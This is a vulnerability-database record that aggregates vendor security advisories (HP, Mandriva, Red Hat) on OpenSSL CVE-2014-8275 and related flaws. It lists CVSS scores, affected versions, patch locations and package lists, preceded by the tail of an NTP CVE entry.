0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7701" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7691" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5196" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7849" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7850" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7852" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7855" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9750" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7854" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7702" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7871" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7851" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7853" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7692" }, { "db": "BID", "id": "77285" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "136963" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "139511" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "CNNVD", "id": "CNNVD-201510-588" }, { "db": "NVD", "id": "CVE-2015-7692" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-7692" }, { "db": "BID", "id": "77285" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "136963" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "139511" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "CNNVD", "id": "CNNVD-201510-588" }, { "db": "NVD", "id": "CVE-2015-7692" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-07T00:00:00", "db": "VULMON", "id": "CVE-2015-7692" }, { "date": "2015-10-21T00:00:00", "db": "BID", "id": "77285" }, { "date": "2017-09-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2015-10-27T23:30:50", "db": "PACKETSTORM", "id": "134102" }, { "date": "2016-05-11T14:00:18", "db": "PACKETSTORM", "id": "136963" }, { "date": "2015-10-21T19:22:22", "db": "PACKETSTORM", "id": "134034" }, { "date": "2016-11-03T10:21:00", "db": "PACKETSTORM", "id": "139511" }, { "date": "2015-11-02T16:48:39", "db": "PACKETSTORM", "id": "134162" }, { "date": "2015-10-30T23:22:57", "db": "PACKETSTORM", "id": "134137" }, { "date": "2015-10-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-588" }, { "date": "2017-08-07T20:29:00.573000", "db": "NVD", "id": "CVE-2015-7692" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-06-18T00:00:00", "db": "VULMON", "id": "CVE-2015-7692" }, { "date": "2017-05-23T16:23:00", "db": "BID", "id": "77285" }, { "date": "2017-09-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "date": "2020-05-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-588" }, { "date": "2020-06-18T16:51:46.323000", "db": "NVD", "id": "CVE-2015-7692" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "136963" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "139511" }, { "db": "CNNVD", "id": "CNNVD-201510-588" } ], "trust": 1.0 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Input validation vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007697" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201510-588" } ], "trust": 0.6 } }
var-201501-0442
Vulnerability from variot
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c. OpenSSL is prone to a local security-bypass vulnerability. Local attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.
Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem. 5 client) - i386, x86_64
- Note: this flaw is not exploitable via the TLS/SSL protocol because the data being transferred is not Base64-encoded. TLS/SSL clients and servers using OpenSSL were not affected by this flaw. (CVE-2015-0289)
Red Hat would like to thank the OpenSSL project for reporting CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0292, and CVE-2015-0293. Upstream acknowledges Emilia Käsper of the OpenSSL development team as the original reporter of CVE-2015-0287, Brian Carpenter as the original reporter of CVE-2015-0288, Michal Zalewski of Google as the original reporter of CVE-2015-0289, Robert Dugal and David Ramos as the original reporters of CVE-2015-0292, and Sean Burford of Google and Emilia Käsper of the OpenSSL development team as the original reporters of CVE-2015-0293. This could lead to a Denial Of Service attack (CVE-2014-3571). In particular this could occur if an attacker sent repeated DTLS records with the same sequence number but for the next epoch. The memory leak could be exploited by an attacker in a Denial of Service attack through memory exhaustion (CVE-2015-0206). This effectively removes forward secrecy from the ciphersuite (CVE-2014-3572). A server could present a weak temporary key and downgrade the security of the session (CVE-2015-0204). This only affects servers which trust a client certificate authority which issues certificates containing DH keys: these are extremely rare and hardly ever encountered (CVE-2015-0205).
OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected (CVE-2014-8275).
The updated packages have been upgraded to the 1.0.0p version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 https://www.openssl.org/news/secadv_20150108.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb LHbCdAkBpYHYSuaUwpiAu1w= =ePa9 -----END PGP SIGNATURE----- . HP SSL for OpenVMS: All versions prior to 1.4-502.
HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the following locations:
- HP SSL for OpenVMS website:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
- HP Support Center website:
https://h20566.www2.hp.com/portal/site/hpsc/patch/home
Note: Login using your HP Passport account. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019 Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.
References:
CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.
HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location
HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=
HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021
HISTORY Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0066-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html Issue date: 2015-01-20 Updated on: 2015-01-21 CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A NULL pointer dereference flaw was found in the DTLS implementation of OpenSSL. A remote attacker could send a specially crafted DTLS message, which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function of OpenSSL parsed certain DTLS messages. A remote attacker could send multiple specially crafted DTLS messages to exhaust all available memory of a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's BigNumber Squaring implementation could produce incorrect results under certain special conditions. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. Note that this issue occurred rarely and with a low probability, and there is currently no known way of exploiting it. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a non-ephemeral key even when the ephemeral ECDH cipher suite was selected. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method than the one requested by the user. (CVE-2014-3572)
It was discovered that OpenSSL would accept ephemeral RSA keys when using non-export RSA cipher suites. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed X.509 certificates. An attacker could use these flaws to modify an X.509 certificate to produce a certificate with a different fingerprint without invalidating its signature, and possibly bypass fingerprint-based blacklisting in applications. (CVE-2014-8275)
It was found that an OpenSSL server would, under certain conditions, accept Diffie-Hellman client certificates without the use of a private key. An attacker could use a user's client certificate to authenticate as that user, without needing the private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to mitigate the above issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites 1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix 1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues 1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record 1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record 1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-1.0.1e-30.el6_6.5.ppc.rpm openssl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-1.0.1e-30.el6_6.5.s390.rpm openssl-1.0.1e-30.el6_6.5.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-devel-1.0.1e-30.el6_6.5.s390.rpm openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
